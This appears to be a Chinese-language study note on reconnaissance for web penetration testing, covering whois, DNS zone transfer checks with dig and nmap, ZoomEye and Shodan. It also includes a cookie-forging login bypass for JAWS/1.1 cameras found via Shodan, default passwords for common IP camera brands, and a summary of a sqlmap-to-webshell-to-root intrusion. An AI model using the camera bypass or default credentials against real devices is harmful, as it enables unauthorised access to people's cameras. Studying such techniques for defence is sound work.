Web渗透02_信息搜集

以两个测试工具官方给出的用于工具实践的网站。一定不要拿在运营的网站做测试。

• http://testfire.net
• http://vulnweb.com

DNS信息搜集

关注域名注册商，管理员的邮箱电话等信息，还有子域名查询。子域名比较重要，因为子站点的防御没有主站点的防御强大，攻陷子站点依旧可以入侵主站的服务器。

1. whois 查询： kali命令，站长之家。
2. 子域名查询： https://searchdns.netcraft.com

DNS域传送 DNS Zone Transfer

这里有一个漏洞，因为互联网中存在备用DNS服务器。备用服务器通过发送请求来使主服务器回复DNS缓存信息。由于一些主DNS服务器错误的配置，导致任何人都可以通过域传送的漏洞，获得主服务器的DNS，而这个DNS里有很多重要的信息。

• Vulhub : DNS Zone Transfers (AXFR)

在Linux下，我们可以使用dig命令来发送dns请求。比如，我们可以用dig @your-ip www.vulhub.org获取域名www.vulhub.org在目标dns服务器上的A记录：

发送axfr类型的dns请求：dig @your-ip -t axfr vulhub.org

可见，我获取到了vulhub.org的所有子域名记录，这里存在DNS域传送漏洞。

我们也可以用nmap script来扫描该漏洞：nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=vulhub.org" -Pn -p 53 your-ip

子域名爆破

通过自建子域名的字典来探寻子域名，任何与爆破相关的方法都是蛮力，吃力不讨好，这个不看也行。

由字典软件创建的几位数字典的数学组合集合生成的字典大到打开字典就能卡死电脑，记得一次8位数密码，大小写字符，标点符号，数字组合就有上百GB,其他的更大。用hydray九头蛇去破解，只能最大用500万条，有些应用还有登陆限制，ssh只能连3次等等。下流方法！

常用命令

• ping: ping domain
• nslookup: nslookup domain
• dig: dig 域名
  • dig +trace domain 详细列出域名请求的路径
  • dig @8.8.8.8 domain 指定dns服务器解析域名
• dnseenum: dnsenum domain 会同时探测域传送漏洞。
• 站长之家

CDN 内容分发网络

CDN的全称是Content Delivery Network，即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络，依靠部署在各地的边缘服务器，通过中心平台的负载均衡、内容分发、调度等功能模块，使用户就近获取所需内容，降低网络拥塞，提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术。

同时会隐藏主站点IP信息。

国内安全新闻：http://www.91ri.org/category/hacknews/china-news

国内安全新闻：https://www.t00ls.net/

安全脉搏：https://www.secpulse.com/

Freebuf网络门户:https://m.freebuf.com/

获取cdn 反向代理等大型网络IP方法

对某使用了CDN网站的渗透过程: 详细介绍了一个通过子站点的渗透，牵连到主站。用sqlmap进行注入，发现注入链接，获取网站管理员账号密码，密码用了加密，爆破密码，登录网站后台，上传木马，获取webSheel,发现没有写权限，上传大马，下载exp到目标服务器，运行直接 root。

钟馗之眼

https://www.zoomeye.org/

可以通过特定的一些组件，来搜索有这些组件的网站或等等的网络设备。而且是全网搜索，这样一来便不用多说了......

国内互联网安全厂商知道创宇开放了他们的海量数据库，对之前沉淀的数据进行了整合、整理，打造了一个名符其实的网络空间搜索引擎ZoomEye，该搜索引擎的后端数据计划包括两部分：

1. 网站组件指纹：包括操作系统，Web服务，服务端语言，Web开发框架，Web应用，前端库及第三方组件等等。
2. 主机设备指纹：结合NMAP大规模扫描结果进行整合。

目前只上线了第一部分网站组件指纹。

使用小计：

有的同学应该还知道国外的shodan（我们称之为：撒旦），这也是一个非常优秀的主机搜索引擎，ZoomEye有些思想也是借鉴了shodan。ZoomEye和Shodan的区别是ZoomEye目前侧重于Web层面的资产发现而Shodan则侧重于主机层面。比如我们以当前使用量世界第一的Blog应用Wordpress作为关键字分别进行搜索。

使用Shodan搜索到了3万多条记录，而使用ZoomEye搜索到了30多W条记录且结果吻合度非常高。

除了最普通的关键词搜索，ZoomEye目前还支持对Web应用指定版本号，比如我们想搜索使用wordpress 3.5.1版本的网站，输入搜索短语wordpress:3.5.1即可。同样我们还可以对国家和城市进行限定，比如输入wordpress:3.5.1 country:cn city:beijing能够搜索到主机位于中国北京且使用wordpress 3.5.1版本的网站。

该搜索引擎目前正在逐步完善，更多功能也在逐步添加当中，目前已经整合了全球4100万网站的网站组件指纹库，数据量相对可观，后期会继续扩充。在搜索框中可以搜索你关心的网站组件，比如discuz、dedecms，比如nginx、apache，甚至你搜hacked by也能得到一些亮点。

钟馗之眼的定位：

全球网站都是由各种组件组成，比如用的哪种操作系统、哪种Web容器、什么服务端语言、什么Web应用等等。这些我们都认为是组件，这些组件构成了网站，形成了我们这个丰富多彩的网络世界。

现在很多攻击都是针对网站组件进行的，拿组件下手是因为组件被使用的很多，只要研究出某个组件的漏洞，就能让使用这个组件的一大批网站沦陷。同理到主机，在我们现有的库里，我们发现了很多亮点，比如亚洲某国的核设施设备，大存储设备，大量Win2000主机（是不是可以直接干掉？），大量的MongoDB数据库（可以直接干掉），数十万的网络摄像头。这个库我们还没开放，会逐渐开放，大家如果要体验主机设备的可以到之前提到过的撒旦网站上。

网站+主机构成了这个网络空间，ZoomEye的目标是采集全球这些指纹，开放搜索引擎，推进这个安全领域的进展，让更多人意识到，你暴露在网络空间上的组件或设备，实际上并不安全，藏着掖着没用！只要你在公网，ZoomEye就会默认收录，不过我们尊重不愿意搜录的网站或设备，这个协议，会在下一步进行。

SeeBug

https://www.seebug.org/

同样由知道创宇研发。漏洞公布平台。

撒旦

https://www.shodan.io/search?query=JAWS%2F1.1

某款摄像头的漏洞

因为摄像头的管理需要通过web，而web又存在漏洞。

网站后台/view2.html

1. 搜索 JAWS/1.1
2. 如果摄像头主没有配置密码 则 admin + 空密码直接登录
3. 如果设置了密码，浏览器控制台通过JS代码绕过。键入下方代码，网址更改为后台即可成功登录
   
   document.cookie="dvr_camcnt=4";
   
   document.cookie="dvr_usr=admin";
   
   document.cookie="dvr_pwd=123";

常用网络摄像机默认密码

• 海康威视IP网络摄像机 admin 12345
• 大华网络摄像机 admin 888888
• 天地伟业网络摄像机 Admin 111111

火狐浏览器插件

1. Wapalyzer 查看网站利用的脚本类型
2. Netcraft Anti-Phishing Extension 网站服务器类型，应用服务器类型等
   
   信息比较简单，聊胜于无。

其他

• 搜集子域名的思路： https://www.secpulse.com/archives/53182.html
• Web信息搜集：网上搜
• 某CCTV摄像头漏洞分析: http://0day5.com/archives/3766/
• shodan语法： 自查
• GHDB: GHDB （又名谷歌黑客数据库）是HTML / JavaScript的封装应用，使用的先进的JavaScript技术搜索黑客所需的信息，而不借助于本地服务器端脚本。尽管数据库更新频率不高，但里边仍然可以找到黑客经常用于Web信息挖掘的Google搜索字符串。
  
  https://www.exploit-db.com/google-hacking-database